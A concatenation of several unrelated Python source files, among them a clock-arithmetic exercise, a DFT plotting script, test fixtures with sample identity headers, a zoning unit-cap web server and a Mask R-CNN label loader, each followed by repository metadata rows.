            cgf=cgf_argument, version = __version__, time=mytime, \
            randomize=randomize_argument,xlen=str(xlen_arg))
    op_template = utils.load_yaml(const.template_file)
    cgf = expand_cgf(cgf_file,xlen,list_duplicate)
    pool = mp.Pool(num_procs)
    results = pool.starmap(create_test, [(usage_str, node,label,base_isa,max_inst) for label,node in cgf.items()])
    pool.close()
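
# Editor's aside (added; illustrative, not part of riscv-ctg): the starmap
# call above fans `create_test` out across `num_procs` worker processes, one
# task per expanded CGF label. The same fan-out pattern in isolation:
#
#     import multiprocessing as mp
#
#     def work(name, count):
#         return name * count
#
#     if __name__ == '__main__':
#         with mp.Pool(2) as pool:
#             print(pool.starmap(work, [('a', 2), ('b', 3)]))  # ['aa', 'bbb']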
37.166667
114
0.626962
0
0
0
0
0
0
0
0
559
0.15667
4c3e29e2ae1ab7be40f9cfea714aae230e6e4e54
2,146
py
Python
Back-End/Python/timers/clock_named_tuple.py
ASHISHKUMAR2411/Programming-CookBook
9c60655d64d21985ccb4196360858d98344701f9
[ "MIT" ]
25
2021-04-28T02:51:26.000Z
2022-03-24T13:58:04.000Z
Back-End/Python/timers/clock_named_tuple.py
ASHISHKUMAR2411/Programming-CookBook
9c60655d64d21985ccb4196360858d98344701f9
[ "MIT" ]
1
2022-03-03T23:33:41.000Z
2022-03-03T23:35:41.000Z
Back-End/Python/timers/clock_named_tuple.py
ASHISHKUMAR2411/Programming-CookBook
9c60655d64d21985ccb4196360858d98344701f9
[ "MIT" ]
15
2021-05-30T01:35:20.000Z
2022-03-25T12:38:25.000Z
from collections import namedtuple MainTimer = namedtuple('MainTimer', 'new_time_joined, end_period, new_weekday, days') def add_time(start, duration, start_weekday=None): weekdays = [ 'Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday' ] start_time, period = start.split(' ') def process_time(): current_hour, current_minute = ([int(t) for t in start_time.split(':')]) end_hour, end_minute = ([int(d) for d in duration.split(':')]) # Adds Current time plus End Time Total end_hours, end_mins = (current_hour + end_hour, current_minute + end_minute) # Calculates Total days passed days = int(end_hours/24) # Calculates New Time new_time_array = [str(end_hours % 12 + end_mins // 60), ':', str(end_mins % 60).rjust(2, '0')] new_time_joined = ''.join(new_time_array) end_period = [period] # Clock, calculates the days elapsed clock = end_hours // 12 if start_weekday: start_day_idx = weekdays.index(start_weekday.title()) new_weekday = weekdays[(start_day_idx + days % 7) % 7] else: new_weekday = False # Figure out whether is AM or PM for i in range(clock): if end_period[-1].lower() == 'am': end_period.append('PM') else: end_period.append('AM') return MainTimer(new_time_joined, end_period, new_weekday, days) # Triggers process time function timed = process_time() def process_output(): new_time = f'New Time is >>> {timed.new_time_joined} {timed.end_period[-1]}' if timed.new_weekday: new_time += f'- {timed.new_weekday} -' if timed.days == 1 and (period != timed.end_period or timed.end_period == 'AM'): new_time += ' (new_day)' elif timed.days > 1: new_time += f' -Total days: {timed.days}- <<' return new_time new_time = process_output() return new_time print('---'*30) x = add_time('10:00 AM', '54:00', 'Monday') print(x) print('---'*30)
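
# Editor's note (added): tracing the demo call above, 10:00 AM plus 54 hours
# is 2 days and 6 hours later, so this script should print
# "New Time is >>> 4:00 PM- Wednesday - -Total days: 2- <<".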
32.029851
102
0.592265
0
0
0
0
0
0
0
0
517
0.240913
4c405ed31ecc4361eadac459e688c3b9b4ba7bba
225
py
Python
mlsurvey/visualize/__init__.py
jlaumonier/mlsurvey
373598d067c7f0930ba13fe8da9756ce26eecbaf
[ "MIT" ]
null
null
null
mlsurvey/visualize/__init__.py
jlaumonier/mlsurvey
373598d067c7f0930ba13fe8da9756ce26eecbaf
[ "MIT" ]
null
null
null
mlsurvey/visualize/__init__.py
jlaumonier/mlsurvey
373598d067c7f0930ba13fe8da9756ce26eecbaf
[ "MIT" ]
null
null
null
from .analyze_logs import AnalyzeLogs from .search_interface import SearchInterface from .detail_interface import DetailInterface from .user_interface import UserInterface from .visualize_log_detail import VisualizeLogDetail
37.5
52
0.888889
0
0
0
0
0
0
0
0
0
0
4c4211ba5dbc8c290d97362485169fd20badaf8a
816
py
Python
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
phunc20/dsp
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
[ "MIT" ]
1
2021-03-12T18:32:06.000Z
2021-03-12T18:32:06.000Z
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
phunc20/dsp
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
[ "MIT" ]
null
null
null
stanford/sms-tools/lectures/02-DFT/plots-code/idft.py
phunc20/dsp
e7c496eb5fd4b8694eab0fc049cf98a5e3dfd886
[ "MIT" ]
null
null
null
import matplotlib.pyplot as plt import numpy as np import sys sys.path.append('../../../software/models/') import dftModel as DFT import math k0 = 8.5 N = 64 w = np.ones(N) x = np.cos(2*np.pi*k0/N*np.arange(-N/2,N/2)) mX, pX = DFT.dftAnal(x, w, N) y = DFT.dftSynth(mX, pX, N) plt.figure(1, figsize=(9.5, 5)) plt.subplot(311) plt.title('positive freq. magnitude spectrum in dB: mX') plt.plot(np.arange(mX.size), mX, 'r', lw=1.5) plt.axis([0,mX.size, min(mX), max(mX)+1]) plt.subplot(312) plt.title('positive freq. phase spectrum: pX') plt.plot(np.arange(pX.size), pX, 'c', lw=1.5) plt.axis([0, pX.size,-np.pi,np.pi]) plt.subplot(313) plt.title('inverse spectrum: IDFT(X)') plt.plot(np.arange(-N/2, N/2), y,'b', lw=1.5) plt.axis([-N/2,N/2-1,min(y), max(y)]) plt.tight_layout() plt.savefig('idft.png') plt.show()
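
# Editor's note (added): k0 = 8.5 deliberately falls between two DFT bins, so
# the magnitude spectrum mX exhibits spectral leakage; with an integer k0
# (e.g. 8) the energy would concentrate in a single bin.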
23.314286
56
0.654412
0
0
0
0
0
0
0
0
153
0.1875
4c43be0918680e081f3bcc9acc58506e39754d60
1,421
py
Python
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
setup.py
jerzydziewierz/typobs
15fa697386f5fb3a1df53b865557c338be235d91
[ "Apache-2.0" ]
null
null
null
# setup.py as described in: # https://stackoverflow.com/questions/27494758/how-do-i-make-a-python-script-executable # to install on your system, run: # > pip install -e . from setuptools import setup, find_packages setup( name='typobs', version='0.0.3', entry_points={ 'console_scripts': [ 'to_obsidian=to_obsidian:run', 'to_typora=to_typora:run', ] }, packages=find_packages(), # metadata to display on PyPI author="Jerzy Dziewierz", author_email="[email protected]", description="Convert between Typora and Obsidian link styles", keywords="Typora Obsidian Markdown link converter", url="https://github.com/jerzydziewierz/typobs", # project home page, if any project_urls={ "Bug Tracker": "https://github.com/jerzydziewierz/typobs", "Documentation": "https://github.com/jerzydziewierz/typobs", "Source Code": "https://github.com/jerzydziewierz/typobs", }, classifiers=[ "Programming Language :: Python", "Topic :: Documentation", "Topic :: Software Development :: Documentation", "Topic :: Office/Business", "Topic :: Text Processing :: Filters", "Topic :: Text Processing :: Markup", "Development Status :: 5 - Production/Stable", "Environment :: Console", "License :: OSI Approved :: Apache Software License", ] )
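
# Editor's aside (added; illustrative stub, not from this repo): each
# console_scripts entry 'name=module:function' expects an importable module
# exposing a zero-argument callable, e.g. a to_obsidian.py of this shape:
#
#     def run():
#         """Entry point invoked by the generated `to_obsidian` executable."""
#         ...
#
# pip generates a small wrapper executable named `to_obsidian` that imports
# the module and calls run().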
36.435897
87
0.640394
0
0
0
0
0
0
0
0
974
0.685433
4c43f28c0f9c6fae0da417c39d88b7b2698c63a6
5,775
py
Python
tests/fixtures.py
ehelms/system-baseline-backend
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
[ "Apache-2.0" ]
null
null
null
tests/fixtures.py
ehelms/system-baseline-backend
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
[ "Apache-2.0" ]
null
null
null
tests/fixtures.py
ehelms/system-baseline-backend
729cc8ba53119a7ed397fb3ea3d46f9ecedb8528
[ "Apache-2.0" ]
null
null
null
""" decoded AUTH_HEADER (newlines added for readability): { "identity": { "account_number": "1234", "internal": { "org_id": "5678" }, "type": "User", "user": { "email": "[email protected]", "first_name": "Firstname", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Lastname", "locale": "en_US", "username": "test_username" } } "entitlements": { "smart_management": { "is_entitled": true } } } """ AUTH_HEADER = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiI1" "Njc4In0sInR5cGUiOiJVc2VyIiwidXNlciI6eyJl" "bWFpbCI6InRlc3RAZXhhbXBsZS5jb20iLCJmaXJz" "dF9uYW1lIjoiRmlyc3RuYW1lIiwiaXNfYWN0aXZl" "Ijp0cnVlLCJpc19pbnRlcm5hbCI6dHJ1ZSwiaXNf" "b3JnX2FkbWluIjpmYWxzZSwibGFzdF9uYW1lIjoi" "TGFzdG5hbWUiLCJsb2NhbGUiOiJlbl9VUyIsInVz" "ZXJuYW1lIjoidGVzdF91c2VybmFtZSJ9fSwiZW50" "aXRsZW1lbnRzIjogeyJzbWFydF9tYW5hZ2VtZW50" "IjogeyJpc19lbnRpdGxlZCI6IHRydWUgfX19Cg==" } AUTH_HEADER_NO_ENTITLEMENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6Ij" "EyMzQiLCJ0eXBlIjoiVXNlciIsInVzZXIiOnsidXNl" "cm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIiwiZW1haWwiOi" "J0ZXN0QGV4YW1wbGUuY29tIiwiZmlyc3RfbmFtZSI6" "IkZpcnN0bmFtZSIsImxhc3RfbmFtZSI6Ikxhc3RuYW" "1lIiwiaXNfYWN0aXZlIjp0cnVlLCJpc19vcmdfYWRt" "aW4iOmZhbHNlLCJpc19pbnRlcm5hbCI6dHJ1ZSwibG" "9jYWxlIjoiZW5fVVMifSwiaW50ZXJuYWwiOnsib3Jn" "X2lkIjoiNTY3OCJ9fX0KCg==" } AUTH_HEADER_SMART_MGMT_FALSE = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJhY2NvdW50X251bWJlciI6" "IjEyMzQiLCJpbnRlcm5hbCI6eyJvcmdfaWQiOiAi" "NTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1c2VyIjp7" "ImVtYWlsIjoidGVzdEBleGFtcGxlLmNvbSIsImZp" "cnN0X25hbWUiOiJGaXJzdG5hbWUiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX2ludGVybmFsIjp0cnVlLCJp" "c19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0X25hbWUi" "OiJMYXN0bmFtZSIsImxvY2FsZSI6ImVuX1VTIiwi" "dXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1lIn19LCJl" "bnRpdGxlbWVudHMiOnsic21hcnRfbWFuYWdlbWVu" "dCI6eyJpc19lbnRpdGxlZCI6IGZhbHNlfX19Cg==" } # this can't happen in real life, adding test anyway AUTH_HEADER_NO_ACCT_BUT_HAS_ENTS = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJpbnRlcm5hbCI6eyJvcmdf" "aWQiOiAiNTY3OCJ9LCJ0eXBlIjogIlVzZXIiLCJ1" "c2VyIjp7ImVtYWlsIjoidGVzdEBleGFtcGxlLmNv" "bSIsImZpcnN0X25hbWUiOiJGaXJzdG5hbWUiLCJp" "c19hY3RpdmUiOnRydWUsImlzX2ludGVybmFsIjp0" "cnVlLCJpc19vcmdfYWRtaW4iOmZhbHNlLCJsYXN0" "X25hbWUiOiJMYXN0bmFtZSIsImxvY2FsZSI6ImVu" "X1VTIiwidXNlcm5hbWUiOiJ0ZXN0X3VzZXJuYW1l" "In19LCJlbnRpdGxlbWVudHMiOnsic21hcnRfbWFu" "YWdlbWVudCI6eyJpc19lbnRpdGxlZCI6IHRydWV9" "fX0K" } """ decoded AUTH_HEADER_NO_ACCT (newlines added for readablity): { "identity": { "internal": { "org_id": "9999" }, "type": "User", "user": { "email": "[email protected]", "first_name": "No", "is_active": true, "is_internal": true, "is_org_admin": false, "last_name": "Number", "locale": "en_US", "username": "nonumber" } } } """ AUTH_HEADER_NO_ACCT = { "X-RH-IDENTITY": "eyJpZGVudGl0eSI6eyJ0eXBlIjoiVXNlciIsInVzZXIiO" "nsidXNlcm5hbWUiOiJub251bWJlciIsImVtYWlsIjoibm" "9udW1iZXJAZXhhbXBsZS5jb20iLCJmaXJzdF9uYW1lIjo" "iTm8iLCJsYXN0X25hbWUiOiJOdW1iZXIiLCJpc19hY3Rp" "dmUiOnRydWUsImlzX29yZ19hZG1pbiI6ZmFsc2UsImlzX" "2ludGVybmFsIjp0cnVlLCJsb2NhbGUiOiJlbl9VUyJ9LC" "JpbnRlcm5hbCI6eyJvcmdfaWQiOiI5OTk5In19fQo=" } BASELINE_ONE_LOAD = { "baseline_facts": [ {"name": "arch", "value": "x86_64"}, {"name": "phony.arch.fact", "value": "some value"}, ], "display_name": "arch baseline", } BASELINE_TWO_LOAD = { "baseline_facts": [ {"name": "memory", "value": "64GB"}, {"name": "cpu_sockets", "value": "16"}, ], "display_name": "cpu + mem baseline", } BASELINE_THREE_LOAD = { "baseline_facts": [ {"name": "nested", "values": 
[{"name": "cpu_sockets", "value": "16"}]} ], "display_name": "cpu + mem baseline", } BASELINE_PARTIAL_ONE = {"baseline_facts": [{"name": "hello", "value": "world"}]} BASELINE_PARTIAL_TWO = { "display_name": "ABCDE", "baseline_facts": [ { "name": "hello", "values": [ {"name": "nested_one", "value": "one"}, {"name": "nested_two", "value": "two"}, ], } ], } BASELINE_PARTIAL_CONFLICT = {"display_name": "arch baseline"} CREATE_FROM_INVENTORY = { "display_name": "created_from_inventory", "inventory_uuid": "df925152-c45d-11e9-a1f0-c85b761454fa", } SYSTEM_WITH_PROFILE = { "account": "9876543", "bios_uuid": "e380fd4a-28ae-11e9-974c-c85b761454fb", "created": "2018-01-31T13:00:00.100010Z", "display_name": None, "fqdn": None, "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", "insights_id": "00000000-28af-11e9-9ab0-c85b761454fa", "ip_addresses": ["10.0.0.3", "2620:52:0:2598:5054:ff:fecd:ae15"], "mac_addresses": ["52:54:00:cd:ae:00", "00:00:00:00:00:00"], "rhel_machine_id": None, "satellite_id": None, "subscription_manager_id": "RHN Classic and Red Hat Subscription Management", "system_profile": { "salutation": "hi", "system_profile_exists": False, "installed_packages": [ "openssl-1.1.1c-2.fc30.x86_64", "python2-libs-2.7.16-2.fc30.x86_64", ], "id": "bbbbbbbb-28ae-11e9-afd9-c85b761454fa", }, "tags": [], "updated": "2018-01-31T14:00:00.500000Z", }
31.557377
81
0.66303
0
0
0
0
0
0
0
0
4,557
0.789091
4c449a22ce009dfff20f9f81e80e2e5aae88a200
3,200
py
Python
2021-02-03/2.py
Elfenreigen/MCM-2021-C-SJTU-Test
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
[ "MIT" ]
1
2022-01-24T11:59:40.000Z
2022-01-24T11:59:40.000Z
2021-02-03/2.py
Elfenreigen/MCM-2021-C-SJTU-Test
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
[ "MIT" ]
null
null
null
2021-02-03/2.py
Elfenreigen/MCM-2021-C-SJTU-Test
98e3b14dbe7bb0ab4a76245d14e4691050704ac9
[ "MIT" ]
null
null
null
#####Time Flow Simulation###### import numpy as np import pandas as pd import matplotlib.pyplot as plt from datetime import timedelta import datetime import csv data=pd.read_excel('CF66-all.xlsx') data.sort_values(by=['WBL_AUD_DT'],ascending=True,inplace=True) or_data=pd.read_excel('CF66-ordinary.xlsx') rule=pd.read_excel('6. Existing pricing strategy.xlsx') or_name=or_data['WBL_NUM'].unique() data['ordinary']=0 for i in range(len(data)): if data.iloc[i,2] in or_name: data.iloc[i,9]=1 data['volume']=data['CNTR_TYPE'] for i in range(len(data)): data.iloc[i,10]=int(data.iloc[i,10][0:2]) raw_data=data.groupby('SVVD') data_to_list=list(raw_data) raw_list=[] for i in data_to_list: raw_list.append(i[1]) total_volume=raw_data['volume'].sum()*1.2 thisrule=rule.groupby(['装港','卸港']).get_group(('营口','海口')) group_rule=thisrule.groupby(['开始天数','结束天数']) rule_to_list=list(group_rule) day_list=[] rule_list=[] for i in rule_to_list: day_list.append(i[0]) rule_list.append(i[1]) m=datetime.timedelta(days=14) newlist=[] for i in raw_list: i['WBL_AUD_DT']=pd.to_datetime(i['WBL_AUD_DT']) m=datetime.timedelta(days=14) j=i[i['WBL_AUD_DT']>=i['WBL_AUD_DT'].max()-m] newlist.append(j) del(raw_list) for i in newlist: i['acc_volume']=i['volume'].cumsum() i['total_volume']=i['volume'].sum()*1.2 m=datetime.timedelta(days=14) i['day']=(i['WBL_AUD_DT']-i['WBL_AUD_DT'].max()+m).dt.days i['acc_rate']=i['acc_volume']/i['total_volume']*100 i['new_AMT']=i['AMT'] for k in range(len(newlist)): acc_20gp=0 acc_40gp=0 acc_40hq=0 print('k='+str(k)) for i in range(len(day_list)): print('i='+str(i)) first_day=day_list[i][0] last_day=day_list[i][1] flag=[0]*len(rule_list[i]) for j in range(len(newlist[k])): if newlist[k].iloc[j]['day']>=first_day and newlist[k].iloc[j]['day']<last_day and newlist[k].iloc[j]['ordinary']==1: for z in range(len(rule_list[i])): print('z='+str(z)) if newlist[k].iloc[j]['acc_rate']>rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='涨价': if flag[z]==0: flag[z]=1 acc_20gp+=rule_list[i].iloc[z]['20GP'] acc_40gp+=rule_list[i].iloc[z]['40GP'] acc_40hq+=rule_list[i].iloc[z]['40HQ'] if newlist[k].iloc[j]['acc_rate']<rule_list[i].iloc[z]['舱位利用率阈值']and rule_list[i].iloc[z]['涨价/降价']=='降价': if flag[z]==0: flag[z]=1 acc_20gp-=rule_list[i].iloc[z]['20GP'] acc_40gp-=rule_list[i].iloc[z]['40GP'] acc_40hq-=rule_list[i].iloc[z]['40HQ'] print(flag) print(acc_20gp) print(acc_40gp) print(acc_40hq) if newlist[k].iloc[j]['CNTR_TYPE']=='20GP': newlist[k].iloc[j,15]+=acc_20gp if newlist[k].iloc[j]['CNTR_TYPE']=='40GP': newlist[k].iloc[j,15]+=acc_40gp if newlist[k].iloc[j]['CNTR_TYPE']=='40HQ': newlist[k].iloc[j,15]+=acc_40hq for i in newlist: print('revenue:'+str(i['AMT'].sum())) print('newrevenue:'+str(i['new_AMT'].sum())) newlist[0].to_csv('voyage1.csv') newlist[1].to_csv('voyage2.csv') newlist[2].to_csv('voyage3.csv')
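
# Editor's note (added): iterating list(df.groupby(key)) yields (key, frame)
# pairs, so the raw_list construction above is equivalent to the one-liner
# raw_list = [group for _, group in data.groupby('SVVD')].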
27.118644
121
0.62375
0
0
0
0
0
0
0
0
702
0.213764
4c483ae5f1b2a18e4178f810a8a5efb2cf0ef940
776
py
Python
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
null
null
null
tests/test_selection.py
qrebjock/fanok
5c3b95ca5f2ec90af7060c21409a11130bd350bd
[ "MIT" ]
1
2020-08-26T12:20:26.000Z
2020-08-26T12:20:26.000Z
import pytest import numpy as np from fanok.selection import adaptive_significance_threshold @pytest.mark.parametrize( "w, q, offset, expected", [ ([1, 2, 3, 4, 5], 0.1, 0, 1), ([-1, 2, -3, 4, 5], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3], 0.1, 0, np.inf), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.1, 0, 4), ([-3, -2, -1, 0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10], 0.15, 0, 3), ( [-1.52, 1.93, -0.76, -0.35, 1.21, -0.39, 0.08, -1.45, 0.31, -1.38], 0.1, 0, 1.93, ), ], ) def test_adaptive_significance_threshold(w, q, offset, expected): w = np.array(w) threshold = adaptive_significance_threshold(w, q, offset=offset) assert threshold == expected
27.714286
79
0.474227
0
0
0
0
678
0.873711
0
0
24
0.030928
4c49699fa44232922a69a87e2fa00808e22b315a
7,256
py
Python
unitcap/unit_cap.py
fintelia/habitationi
7dd15ecbab0ad63a70505920766de9c27294fb6e
[ "Apache-2.0" ]
1
2021-10-03T14:44:38.000Z
2021-10-03T14:44:38.000Z
unitcap/unit_cap.py
fintelia/habitationi
7dd15ecbab0ad63a70505920766de9c27294fb6e
[ "Apache-2.0" ]
null
null
null
unitcap/unit_cap.py
fintelia/habitationi
7dd15ecbab0ad63a70505920766de9c27294fb6e
[ "Apache-2.0" ]
1
2021-02-20T23:22:10.000Z
2021-02-20T23:22:10.000Z
#!/usr/bin/python # Copyright 2019 Christopher Schmidt # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from BaseHTTPServer import BaseHTTPRequestHandler,HTTPServer from urlparse import urlparse, parse_qs from jinja2 import Template import sqlite3 import urllib def get_caps(options): far = {} for i in ['A-1', 'A-2', 'B', 'SD-2']: far[i] = 0.5 for i in ['C', 'SD-9', 'SD-10F', 'SD-10H']: far[i] = 0.6 for i in ['C-1', 'BA-3', 'IB-2', 'O-1']: far[i] = .75 for i in ['BA-1', 'SD-12']: far[i] = 1.0 for i in ['C-1A', 'SD-5']: far[i] = 1.25 for i in ['IA-1', 'IA', 'O-2A', 'SD-4A', 'SD-13']: far[i] = 1.5 for i in ['C-2', 'C-2B', 'BA', 'BA-2', 'SD-8']: far[i] = 1.75 for i in ['BC', 'O-2']: far[i] = 2.0 for i in ['C-2A']: far[i] = 2.50 for i in ['C-3', 'C-3A', 'C-3B', 'BB', 'BB-2', 'BC-1', 'IB-1', 'O-3', 'O-3A', 'SD-1', 'SD-6', 'SD-7']: far[i] = 3.0 for i in ['IA-2', 'IB']: far[i] = 4.0 far['BB-1'] = 3.25 far['SD-11'] = 1.7 far['SD-15'] = 3.5 lot_area = { 'A-1': 6000, 'A-2': 4500, 'C-1A': 1000, 'BC': 500, 'BC-1': 450, 'IA-1': 700, 'SD-8': 650, 'SD-14': 800, } for i in ['IB-2', 'BA-1']: lot_area[i] = 1200 for i in ['B', 'SD-2', 'SD-3']: lot_area[i] = 2500 for i in ['C', 'SD-10F', 'SD-10H', 'SD-9']: lot_area[i] = 1800 for i in ['C-1', 'BA-3']: lot_area[i] = 1500 for i in ['C-2', 'C-2B', 'O-2', 'BA', 'BA-2', 'SD-4', 'SD-4A', 'SD-5', 'SD-11', 'SD-13']: lot_area[i] = 600 for i in ['C-2A', 'C-3', 'C-3A', 'C-3B', 'BB', 'BB-1', 'BB-2', 'SD-1', 'SD-6', 'SD-7']: lot_area[i] = 300 for i in lot_area: if options and 'lot_explicit' in options: lot_area[i] = options['lot_explicit'] elif options and 'lot_factor' in options: lot_area[i] = int(lot_area[i] / float(options['lot_factor'])) if 'no_lot' in options: lot_area = {} for i in far: if options and 'far_explicit' in options: far[i] = options['far_explicit'] elif options and 'far_factor' in options: far[i] = far[i] * float(options['far_factor']) if 'no_far' in options: far = {} return far, lot_area def table(options): far, lot_area = get_caps(options) table = [] for i in ['A-1', 'A-2', 'B', 'C', 'C-1', 'C-1A', 'C-2', 'C-2A', 'C-2B', 'C-3', 'C-3A', 'C-3B']: table.append("<tr><td>%s</td><td>%s</td><td>%s</td></tr>" % (i, far.get(i, ""), lot_area.get(i,""))) return "\n".join(table) def unit_cap(row, options=None): if not options: options = {} far, lot_area = get_caps(options) zone = row['zone'] if (not zone.startswith("C") and not zone in ("A-1", "A-2", "B")) or zone == "CRDD": return -1 if zone in ['A-1', 'A-2'] and not 'no_a' in options: return 1 #print row area = float(row.get('gis_lot_size',0) or 0) if zone in lot_area and area: m = max(area/(lot_area[zone]), 1) else: m = 100000 max_building = area * far[zone] * 1 if max(int(max_building/800), 1) < m: m = max(int(max_building/800), 1) if zone == "B" and not 'no_b' in options: m = min(m, 2) return m def dict_factory(cursor, row): d = {} for idx, col in enumerate(cursor.description): d[col[0]] = row[idx] return d def compute_count(options = None): conn = sqlite3.connect("prop.db") if options == None: options = {} c = conn.cursor() 
c.row_factory = dict_factory m = 0 current = 0 for row in c.execute("SELECT * FROM lots"): t = unit_cap(row, options=options) if t == -1: continue m += int(t) return m def describe(options): changes = [] if 'no_lot' in options: changes.append("eliminate lot size/unit minimums") elif 'lot_explicit' in options: changes.append("set all lot size/unit minimums to %s" % options['lot_explicit']) elif 'lot_factor' in options and options['lot_factor'] != 1.0: changes.append('decrease lot size minimums by a factor of %s' % options['lot_factor']) if 'no_a' in options: changes.append('eliminate single family zoning in A-1 and A-2 zones') if 'no_b' in options: changes.append('eliminate two-family zoning limits in B zones') if 'far_explicit' in options: changes.append("set all FAR maximums to %s" % options['far_explicit']) elif 'far_factor' in options and options['far_factor'] != 1.0: changes.append('increase FAR maximums by a factor of %s' % options['far_factor']) if len(changes): return ", ".join(changes) else: return "" def serve(options): d = open("unit_template.html") template = Template( d.read() ) unit_count = int(compute_count(options)) data = {} data['changes'] = describe(options) data['unit_count'] = unit_count data['increase'] = unit_count-37453 data['table'] = table(options) data['options'] = options s = template.render(**data) return s PORT_NUMBER = 8080 class myHandler(BaseHTTPRequestHandler): def do_GET(self): self.send_response(200) self.send_header('Content-type','text/html') self.end_headers() # Send the html message form = parse_qs(urlparse(self.path).query) options = {} for i in ['far_factor', 'lot_factor']: if i in form: options[i] = float(form[i][0]) else: options[i] = 1.0 if 'far_explicit' in form and form['far_explicit']: options['far_explicit'] = float(form['far_explicit'][0]) if 'lot_explicit' in form and form['lot_explicit']: options['lot_explicit'] = int(form['lot_explicit'][0]) if 'lot' in form: options['no_lot'] = True if 'singlefamily' in form: options['no_a'] = True if 'twofamily' in form: options['no_b'] = True self.wfile.write(serve(options)) return def run(): try: #Create a web server and define the handler to manage the #incoming request server = HTTPServer(('', PORT_NUMBER), myHandler) print 'Started httpserver on port ' , PORT_NUMBER #Wait forever for incoming htto requests server.serve_forever() except KeyboardInterrupt: print '^C received, shutting down the web server' server.socket.close() if __name__ == "__main__": print run()
32.106195
108
0.553335
961
0.132442
0
0
0
0
0
0
2,354
0.324421
4c4972e50ba94dc3591b0fc9fac43e37a601a455
25
py
Python
matrix/__init__.py
AbhiK002/Matrix
2d83f08877dccba9e4c710bd5fb65f613848d63f
[ "MIT" ]
2
2022-02-11T04:39:21.000Z
2022-02-12T15:50:35.000Z
matrix/__init__.py
AbhiK002/Matrix
2d83f08877dccba9e4c710bd5fb65f613848d63f
[ "MIT" ]
null
null
null
matrix/__init__.py
AbhiK002/Matrix
2d83f08877dccba9e4c710bd5fb65f613848d63f
[ "MIT" ]
null
null
null
from .main import Matrix
12.5
24
0.8
0
0
0
0
0
0
0
0
0
0
4c497bbd6391fbc0eaad2b9548fcee8c07a53d5e
2,348
py
Python
samples/cmk/test.py
jasstionzyf/Mask_RCNN
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
[ "MIT" ]
null
null
null
samples/cmk/test.py
jasstionzyf/Mask_RCNN
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
[ "MIT" ]
null
null
null
samples/cmk/test.py
jasstionzyf/Mask_RCNN
971a9dd9be1f9716e6f7c23b959bd57079cd93eb
[ "MIT" ]
null
null
null
import os
import sys
import json
import datetime
import numpy as np
import glob
import skimage
from PIL import Image as pil_image
import cv2


def locationToMask(locations=None,height=None,width=None):
    mask = np.zeros([height, width, len(locations)], dtype=np.uint8)
    for index,location in enumerate(locations):
        x1, y1, x2, y2 = location
        mask[y1:y2+1,x1:x2+1,index]=1
        print(mask[:,:,index])

    return mask.astype(np.bool), np.ones([mask.shape[-1]], dtype=np.int32)


def load_cmk(dataset_dir, subset):
    folder=os.path.join(dataset_dir, subset)
    imagesPattern=folder+'/*.jpg'
    for image_path in glob.glob(imagesPattern):
        print(image_path)
        img = cv2.imread(image_path)
        height,width = img.shape[:2]
        imageId=os.path.basename(image_path).replace('.jpg','')
        print(imageId)
        #
        # self.add_image(
        #     "balloon",
        #     image_id=a['filename'],  # use file name as a unique image id
        #     path=image_path,
        #     width=width, height=height,
        #     polygons=polygons)

        locationsFile='%s/%s.txt' % (folder,imageId)
        locations=[]
        with open(locationsFile) as fp:
            lines = fp.readlines()
            for line in lines:
                line = line.replace('\n', '')
                if len(line.split(' ')) < 5:
                    break
                classIndex, xcen, ycen, w, h = line.strip().split(' ')
                xmin = max(float(xcen) - float(w) / 2, 0)
                xmax = min(float(xcen) + float(w) / 2, 1)
                ymin = max(float(ycen) - float(h) / 2, 0)
                ymax = min(float(ycen) + float(h) / 2, 1)

                xmin = int(width * xmin)
                xmax = int(width * xmax)
                ymin = int(height * ymin)
                ymax = int(height * ymax)
                location=(xmin,ymin,xmax,ymax)
                locations.append(location)
        print(locations)


dataset_dir='/Volumes/v2/data/mlib_data/dataset/cmk/images_v2/'
subset='val'
load_cmk(dataset_dir=dataset_dir,subset=subset)

locations=[(2,3,5,7),(8,8,9,9)]
height=10
width=10
# mask,classIds=locationToMask(locations=locations,height=height,width=width)
# print(mask)
# print(classIds)
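
# Editor's note (added): the label rows parsed above follow the YOLO format
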